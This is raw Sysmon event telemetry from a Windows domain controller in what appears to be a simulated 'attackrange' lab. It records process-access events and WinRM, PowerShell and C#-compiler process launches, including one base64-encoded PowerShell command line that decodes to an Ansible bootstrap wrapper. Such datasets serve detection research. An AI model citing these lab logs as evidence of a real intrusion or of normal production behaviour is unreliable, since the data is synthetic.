13:54:01.264{10ACEC4A-8540-5FCF-0C00-000000009101}5961060C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003053Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.264{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8579-5FCF-8E00-000000009101}5096C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003052Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.264{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8579-5FCF-8E00-000000009101}5096C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003051Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.277{10ACEC4A-8579-5FCF-8E00-000000009101}5096C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{10ACEC4A-8579-5FCF-5CDD-050000000000}0x5dd5c0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000003050Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.264{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003049Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.264{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003048Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:01.264{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003182Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.949{10ACEC4A-8579-5FCF-8F00-000000009101}51081552C:\Windows\system32\conhost.exe{10ACEC4A-857A-5FCF-9600-000000009101}3368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003181Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.949{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003180Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.949{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003179Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.949{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003178Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.949{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003177Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.949{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003176Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.949{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003175Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.949{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003174Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.949{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003173Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.949{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003172Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.949{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-857A-5FCF-9600-000000009101}3368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003171Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.949{10ACEC4A-8579-5FCF-9200-000000009101}43364500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-857A-5FCF-9600-000000009101}3368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c19a9|UNKNOWN(00007FF81926BBEF) 154100x80000000000000003170Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.955{10ACEC4A-857A-5FCF-9600-000000009101}3368C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\ansible-moduletmp-132519092429341837-1367220028\4zc5nzpp.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8579-5FCF-5CDD-050000000000}0x5dd5c0HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{10ACEC4A-8579-5FCF-9200-000000009101}4336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x80000000000000003169Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.949{10ACEC4A-8579-5FCF-9200-000000009101}4336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\ansible-moduletmp-132519092429341837-1367220028\4zc5nzpp.cmdline2020-12-08 13:54:02.949 11241100x80000000000000003168Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:02.949{10ACEC4A-8579-5FCF-9200-000000009101}4336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\ansible-moduletmp-132519092429341837-1367220028\4zc5nzpp.dll2020-12-08 13:54:02.949 11241100x80000000000000003167Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:02.668{10ACEC4A-857A-5FCF-9400-000000009101}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\kccz3rzq.dll2020-12-08 13:54:02.247 10341000x80000000000000003166Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.653{10ACEC4A-8579-5FCF-8F00-000000009101}51081552C:\Windows\system32\conhost.exe{10ACEC4A-857A-5FCF-9500-000000009101}2228C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003165Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.653{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-857A-5FCF-9500-000000009101}2228C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003164Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.653{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003163Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:02.653{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll